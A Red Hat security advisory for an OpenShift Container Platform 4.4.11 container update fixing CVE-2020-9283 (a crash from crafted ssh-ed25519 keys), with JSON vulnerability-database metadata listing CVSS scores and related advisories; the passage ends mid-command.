(RHSA-2020:2790) Low: OpenShift Container Platform 4.4.11 ose-azure-machine-controllers-container security update

2020-07-06T20:07:35

Description

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Security Fix(es): * golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allowed for panic (CVE-2020-9283) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

{"id": "RHSA-2020:2790", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2020:2790) Low: OpenShift Container Platform 4.4.11 ose-azure-machine-controllers-container security update", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allowed for panic (CVE-2020-9283)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "published": "2020-07-06T20:07:35", "modified": "2020-07-06T20:08:30", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://access.redhat.com/errata/RHSA-2020:2790", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2020-9283"], "immutableFields": [], "lastseen": "2021-10-19T20:36:42", "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-202003-4"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1032"]}, {"type": "cve", "idList": ["CVE-2020-9283"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2402-1:C1E9C", "DEBIAN:DLA-2453-1:06602", "DEBIAN:DLA-2455-1:AB97D"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-9283"]}, {"type": "exploitdb", "idList": ["EDB-ID:48121"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:BBAC75CC4F436EA7C87BF4A93573E140"]}, {"type": "github", "idList": ["GHSA-FFHG-7MH4-33C4"]}, {"type": "githubexploit", "idList": ["4885CEF9-D05F-5F90-87FD-2C29C6ADAC5D"]}, {"type": "hackerone", "idList": ["H1:1294043"]}, {"type": "ibm", "idList": ["9639F84E85C1FD3D4C5A89655B415BE95E955B63B48D2B85EF64F81DAC429A11"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2402.NASL", "DEBIAN_DLA-2453.NASL", "DEBIAN_DLA-2455.NASL", "REDHAT-RHSA-2020-3369.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156480"]}, {"type": "redhat", "idList": ["RHSA-2020:2412", "RHSA-2020:2413", "RHSA-2020:2789", "RHSA-2020:2793", "RHSA-2020:2878", "RHSA-2020:3078", "RHSA-2020:3369", "RHSA-2020:3372", "RHSA-2020:3414", "RHSA-2020:3809", "RHSA-2020:4264", "RHSA-2020:4298", "RHSA-2021:0799", "RHSA-2021:1129"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-9283"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-9283"]}, {"type": "zdt", "idList": ["1337DAY-ID-34008"]}]}, "score": {"value": 4.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "archlinux", "idList": ["ASA-202003-4"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1032"]}, {"type": "cve", "idList": ["CVE-2020-9283"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2402-1:C1E9C"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-9283"]}, {"type": "exploitdb", "idList": ["EDB-ID:48121"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:BBAC75CC4F436EA7C87BF4A93573E140"]}, {"type": "github", "idList": ["GHSA-FFHG-7MH4-33C4"]}, {"type": "githubexploit", "idList": ["4885CEF9-D05F-5F90-87FD-2C29C6ADAC5D"]}, {"type": "hackerone", "idList": ["H1:1294043"]}, {"type": "ibm", "idList": ["9639F84E85C1FD3D4C5A89655B415BE95E955B63B48D2B85EF64F81DAC429A11"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2402.NASL", "REDHAT_UPDATE_LEVEL.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156480"]}, {"type": "redhat", "idList": ["RHSA-2021:1129"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-9283"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-9283"]}, {"type": "zdt", "idList": ["1337DAY-ID-34008"]}]}, "exploitation": null, "vulnersScore": 4.9}, "affectedPackage": [], "vendorCvss": {"severity": "low"}, "_state": {"dependencies": 1647589307, "score": 0}}

{"redhat": [{"lastseen": "2021-10-19T20:39:36", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allowed for panic (CVE-2020-9283)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-07-06T20:25:04", "type": "redhat", "title": "(RHSA-2020:2789) Low: OpenShift Container Platform 4.4.11 ose-baremetal-operator-container security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2020-07-06T20:26:03", "id": "RHSA-2020:2789", "href": "https://access.redhat.com/errata/RHSA-2020:2789", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-19T20:38:51", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allowed for panic (CVE-2020-9283)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-08-12T04:43:08", "type": "redhat", "title": "(RHSA-2020:3414) Low: OpenShift Container Platform 4.5.5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2020-08-12T04:43:52", "id": "RHSA-2020:3414", "href": "https://access.redhat.com/errata/RHSA-2020:3414", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-19T20:37:47", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic (CVE-2020-9283)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-07-14T01:16:05", "type": "redhat", "title": "(RHSA-2020:2878) Low: OpenShift Container Platform 4.4.12 ose-cloud-credential-operator-container security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2020-07-14T01:16:56", "id": "RHSA-2020:2878", "href": "https://access.redhat.com/errata/RHSA-2020:2878", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-19T20:37:28", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allowed for panic (CVE-2020-9283)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-07-06T20:05:48", "type": "redhat", "title": "(RHSA-2020:2793) Low: OpenShift Container Platform 4.4.11 atomic-openshift-descheduler-container security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2020-07-06T20:06:47", "id": "RHSA-2020:2793", "href": "https://access.redhat.com/errata/RHSA-2020:2793", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-19T20:36:23", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: The processing of crafted SSH ed25519 keys can cause applications that use the SSH package of the golang.org/x/crypto library to stop working. (CVE-2020-9283)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-07-28T12:31:30", "type": "redhat", "title": "(RHSA-2020:3078) Low: OpenShift Container Platform 4.4.14 ose-cluster-machine-approver-container security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2020-07-28T12:32:20", "id": "RHSA-2020:3078", "href": "https://access.redhat.com/errata/RHSA-2020:3078", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-19T20:38:18", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allowed for panic (CVE-2020-9283)\n\n* kubernetes: Node disk DOS by writing to container /etc/hosts (CVE-2020-8557)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-09-23T14:08:44", "type": "redhat", "title": "(RHSA-2020:3809) Moderate: OpenShift Container Platform 4.3.38 container image security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8557", "CVE-2020-9283"], "modified": "2020-09-23T14:09:45", "id": "RHSA-2020:3809", "href": "https://access.redhat.com/errata/RHSA-2020:3809", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-19T20:36:49", "description": "Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an on-premise OpenShift Container Platform installation.\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic (CVE-2020-9283)\n\n* golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-08-06T20:17:21", "type": "redhat", "title": "(RHSA-2020:3372) Moderate: Red Hat OpenShift Service Mesh 3scale-istio-adapter-rhel8-container security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11080", "CVE-2020-14040", "CVE-2020-9283"], "modified": "2020-08-06T20:18:14", "id": "RHSA-2020:3372", "href": "https://access.redhat.com/errata/RHSA-2020:3372", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-19T20:36:56", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* kubernetes: Denial of service in API server via crafted YAML payloads by authorized users (CVE-2019-11254)\n\n* kubernetes: node localhost services reachable via martian packets (CVE-2020-8558)\n\n* proglottis/gpgme: Use-after-free in GPGME bindings during container image pull (CVE-2020-8945)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-13T16:35:46", "type": "redhat", "title": "(RHSA-2020:2413) Moderate: OpenShift Container Platform 4.5 package security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11252", "CVE-2019-11254", "CVE-2020-8558", "CVE-2020-8945", "CVE-2020-9283"], "modified": "2020-08-06T07:10:31", "id": "RHSA-2020:2413", "href": "https://access.redhat.com/errata/RHSA-2020:2413", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:39:06", "description": "Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an on-premise OpenShift Container Platform installation.\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic (CVE-2020-9283)\n\n* nodejs-lodash: prototype pollution in zipObjectDeep function (CVE-2020-8203)\n\n* jQuery: passing HTML containing <option> elements to manipulation methods could result in untrusted code execution (CVE-2020-11023)\n\n* macaron: open redirect in the static handler (CVE-2020-12666)\n\n* golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-08-06T20:06:08", "type": "redhat", "title": "(RHSA-2020:3369) Moderate: Red Hat OpenShift Service Mesh security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11023", "CVE-2020-12666", "CVE-2020-14040", "CVE-2020-8203", "CVE-2020-9283"], "modified": "2020-08-06T20:13:35", "id": "RHSA-2020:3369", "href": "https://access.redhat.com/errata/RHSA-2020:3369", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-10-19T20:38:58", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allowed for panic (CVE-2020-9283)\n\n* kubernetes: Denial of service in API server via crafted YAML payloads by authorized users (CVE-2019-11254)\n\n* js-jquery: prototype pollution in object's prototype led to denial of service or remote code execution or property injection (CVE-2019-11358)\n\n* kubernetes: node localhost services reachable via martian packets (CVE-2020-8558)\n\n* containernetworking/plugins: IPv6 router advertisements allowed for MitM attacks on IPv4 clusters (CVE-2020-10749)\n\n* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method (CVE-2020-11022)\n\n* jQuery: passing HTML containing <option> elements to manipulation methods could result in untrusted code execution (CVE-2020-11023)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-13T17:07:56", "type": "redhat", "title": "(RHSA-2020:2412) Moderate: OpenShift Container Platform 4.5 container image security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11252", "CVE-2019-11254", "CVE-2019-11358", "CVE-2020-10749", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-8558", "CVE-2020-9283"], "modified": "2020-07-24T00:24:13", "id": "RHSA-2020:2412", "href": "https://access.redhat.com/errata/RHSA-2020:2412", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:40:57", "description": "Red Hat 3scale API Management delivers centralized API management features through a distributed, cloud-hosted layer. It includes built-in features to help in building a more successful API program, including access control, rate limits, payment gateway integration, and developer experience tools.\n\nThis advisory is intended to use with container images for Red Hat 3scale API Management 2.10.0.\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic (CVE-2020-9283)\n\n* golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-07T09:52:40", "type": "redhat", "title": "(RHSA-2021:1129) Moderate: Red Hat 3scale API Management 2.10.0 security update and release", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-20843", "CVE-2019-11719", "CVE-2019-11727", "CVE-2019-11756", "CVE-2019-12749", "CVE-2019-14836", "CVE-2019-14866", "CVE-2019-15903", "CVE-2019-17006", "CVE-2019-17023", "CVE-2019-17498", "CVE-2019-19126", "CVE-2019-19532", "CVE-2019-19956", "CVE-2019-20388", "CVE-2019-20907", "CVE-2019-5094", "CVE-2019-5188", "CVE-2020-0427", "CVE-2020-12243", "CVE-2020-12400", "CVE-2020-12401", "CVE-2020-12402", "CVE-2020-12403", "CVE-2020-12723", "CVE-2020-14040", "CVE-2020-14351", "CVE-2020-1971", "CVE-2020-25211", "CVE-2020-25645", "CVE-2020-25656", "CVE-2020-25705", "CVE-2020-28374", "CVE-2020-29661", "CVE-2020-6829", "CVE-2020-7053", "CVE-2020-7595", "CVE-2020-8177", "CVE-2020-9283", "CVE-2021-20265"], "modified": "2021-05-25T21:31:07", "id": "RHSA-2021:1129", "href": "https://access.redhat.com/errata/RHSA-2021:1129", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-13T02:29:35", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic (CVE-2020-9283)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Gather image registry config (backport to 4.3) (BZ#1836815)\n\n* Builds fail after running postCommit script if OCP cluster is configured with a container registry whitelist (BZ#1849176)\n\n* Login with OpenShift not working after cluster upgrade (BZ#1852429)\n\n* Limit the size of gathered federated metrics from alerts in Insights Operator (BZ#1874018)\n\n* [4.3] Storage operator stops reconciling when going Upgradeable=False on v1alpha1 CRDs (BZ#1879110)\n\n* [release 4.3] OpenShift APIs become unavailable for more than 15 minutes after one of master nodes went down(OAuth) (BZ#1880293)\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.3.40-x86_64\n\nThe image digest is sha256:9ff90174a170379e90a9ead6e0d8cf6f439004191f80762764a5ca3dbaab01dc\n\n(For s390x architecture)\n\n $ oc adm release 